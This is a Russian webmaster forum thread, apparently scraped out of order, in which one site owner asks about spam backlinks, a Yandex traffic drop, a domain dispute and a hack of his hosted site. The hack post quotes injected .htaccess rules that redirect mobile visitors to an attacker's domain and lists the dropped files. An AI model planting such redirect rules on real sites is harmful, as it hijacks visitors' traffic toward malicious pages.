А зачем тогда это делалось? Для чего-то ведь делалось.
По webstat количество запросов в месяц по тому кею, что вписывали эти люди в постах своих блогов, а может и не только блогов, всего 2.
Я не пользуюсь статистикой Яндекса и этой панелью. Только Li, статсы Google и логи веб-сервера изучаю. По поиску Яндекса (на blogs.yandex.ru) выдается более ~ 130 результатов. Сколько из них неестественных точно не могу сказать, но я могу выписать прямо список блогов, где стоят эти непонятные ссылки и отправить в Яндекс.
Если не ошибаюсь, то в деле Denso.com была высказана и обратная мысль, т.е. что не только владельцы доменов, но и компании, которые хотят соответствующие домены иметь, соглашались с правилами соответствующей доменной зоны и правилами UDRP, а потому должны их выполнять.
Я еще заметил, что в последнее время в постах в различных блогах выставлялись ссылки на сайт с ключевыми словами в них и коротким текстом в таких постах.
Кто это делал, зачем и почему, я так и не понял. Но показалось все это очень подозрительным и это явно было похоже на какую-то подставу, так как выглядело все это неестественно.
Как думаете могли ли меня таким образом подставить или зачем все это делалось? Я потому что так и не понял, до сих пор точно не уверен
И стоит ли писать об этом в суппорт Яндекса, если я все-таки туда обращусь.---------- Добавлено 01.11.2012 в 22:00 ----------
Финансы, банки---------- Добавлено 01.11.2012 в 22:23 ----------Кстати, по адресу многих из этих блогов теперь стоит подпись:
Блог удален
К сожалению, блог по адресу abcdefg.blogspot.com удален. Этот адрес недоступен для новых блогов.
Но в livejournal такие блоги и сейчас остались.
И тексты там похоже на спам типа: идет какая-то статья про принтер или там про лягушек каких-то, а внизу статьи пару слов про мой сайт и ссылка с ненужным мне кеем. (при этом сайт у меня не про принтеры и не про природу).
Так если 2 страницы в индексе, то по-вашему что это? База отвалилась, фильтр какой-то или еще что-то непонятное нечто. Или Be1 глючит, т.е. сам Яндекс еще не успел обновить информацию о том, сколько страниц в индексе? Не ясно сколько ждать как бы)
Да, посмотрел через be1..
раздел "проиндексированные": 2 страницы - титульная и наиболее популярная (на нее куча естественных ссылок, везде народ сам ставит на форумах, своих сайтах и пр.)
после "проиндексированные" там еще идет "*" -
"Область поиска: сайт — xyz.com
Искомая комбинация слов нигде не встречается."
Т.е. вообще ничего нет.
По Li - я заметил, что вообще не было показателей для статистики запросов из Яндекса. Но я с подобным уже сталкивался по крайней мере для Google, т.е. это сбой Li или еще что-то, потом все быстро восстанавливалось. И сейчас смотрю вроде в статистике запросов для Яндекса появились запросы (ключевые слова и их позиции), но большинство на дальних позициях, кроме пары-тройки запросов для страниц, что выше.
У меня были переходы со "школьного" Яндекса, поэтому вряд ли могли adult-фильт на сайт повесить. Там нет ничего почему это можно было бы сделать.
Некоторое время каким-то недоумками на сайте был изменен .htaccess, который вел куда-то не туда, но у меня сложилось впечатление, что это для мобильных устойств делалось, чтобы перенаправить трафик, т.е. если и должно был что-то упасть, то трафик с m.yandex (как мне кажется) + титульную страницу должны были исключить + в поиске могла появиться надпись, что сайт опасен, но ничего этого нет. Сейчас с htaccess все в порядке.
Не знаю. Что скажете - подождать или в суппорт писать?
PS: еще надо сказать, что сайт не обновлял некоторое время, был занят, но там есть форум и новые записи появляются регулярно. титульная страница опять же есть в индексе.
У меня по графику именно Яндекс упал - у меня с него больше всего посетителей идет.
Судя по всему, упала посещаемость, т.е кол-во просмотров страниц и соответственно кликов. И просел трафик с Яндекса, хотя если по seorate смотреть, то там все нормально и сейчас с позициями. Не знаю, может эта история с вирусами ХЦ сыграла негативную роль. Причем трафик с мобильного Яндекса (m.yandex.ru), который в статистике Li пказывается тдельно, не упал, а скорее даже вырос.
Подскажите, ести ТЗ аннулируется, то домен тоже отнимается у компании или как?
Угу, именно там. Значит это явный косяк хостера. Причем я папку с Webalizer отдельно еще прикрыл через .htpasswd, но все равно не помогло (если, конечно, дело в нем) - возможно обращались нарямую к программе, котоая где-то там стоит в недрах РБК.
PS: если вы там же хоститесь, то наверняка найдете те же файлы, что и я. вообще хотелось бы понять, что и где нужно почистить, чтбы ликвидировать заразу.
PPS: задолбался им звонить на телефон утром, там у них меня и нужно нажать 1, чтобы переключиться на оператора, сколько не жал и не звонил, так и не смог переключиться. поддержка онлайн тоже не работала.
PPPS: особенно "доставляет" ссылка на памятку на их сайте (что вам в письме должна была прийти), кесли ее почитать, то суть там сводится к тому, что если вас взломали, то это не хостер виноват (там типа все надежно), а потому что вы что-то сделали не так
PPPPS: посмотрим теперь будут ли они защищать клиентов и будут ли пытаться отловить хакеров. когда-то на VH был массовый взлом с вирусами, они ничего тогда делать в этом направлении не стали и я от них свалил.
Утро началось недобро. На одном из сайтов такое...
Антивирусная проверка сайта шлет на мейл визги, что по адресу вида:
... /webalizer/usage_200801.html
обнаружено зло в виде:
winnow.botnet.ff.trojans.23137.UNOFFICIAL
В процессе проверки на сервере найдены "левые" файлы: index.php, cn.php, wap.php, config, system, где файл config составляет более 20 Мб. (нафига?)
В файле htaccess найдены традиционные для таких тем
RewriteCond %{HTTP_USER_AGENT} acs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alav [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alca [NC,OR]
...
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
RewriteRule ^(.*)$ http://adresdolbodyatlov.net/?a=u2w4t2w423m254l [L,R=302]
Естественно, пришлось писать в суппорт разобраться, что за фигня. Ответа пока не пришло.
Какие будут мнения?
На первый взгляд все дело может быть в Webalizer, там дыра и тогда это явный прокол хостера. Но может я и ошибаюсь, и нужно в своих скриптах дыру поискать, больше особо негде, так как каких-то внешних форумов, CMS и пр. на этом сайте не стоит. И PHP я не пользуюсь тоже.
Более интересный вопрос - украли ли какой-то контент с сайта и пр. информацию, так как там самописные скрипты и пр.? Как это можно определить? В чем цель взлома была?
Если просто детишки балуются, чтобы лишние пару-тройку $$$ с партнерки срубить, то ладно, а вот если чего украсть хотели, учетные данные пользователей и пр. - тут вопрос, может и в полицию заявить имеет смысл, так как сайт серьезный?
